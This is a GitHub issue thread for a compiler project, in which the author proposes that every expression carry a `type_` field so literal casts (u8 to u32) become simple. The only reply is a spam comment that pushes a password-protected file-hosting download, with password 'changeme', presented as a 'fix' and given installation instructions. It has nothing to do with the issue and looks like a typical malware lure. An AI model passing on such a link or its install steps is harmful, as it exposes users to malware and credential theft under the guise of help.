### ISSUE TITLE
Every expression should contain `type_` field

### ISSUE THREAD

**Issue by MilkeeyCat** [MilkeeyCat/meraki#52]
It would be better to have `type_` field in each expression, it would help with cast expressions, then it would not require any hooplas, just update the `type_` field and that's it but because of it's absence it's not really possible to cast integer literals to bigger types(`u8` to `u32`)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
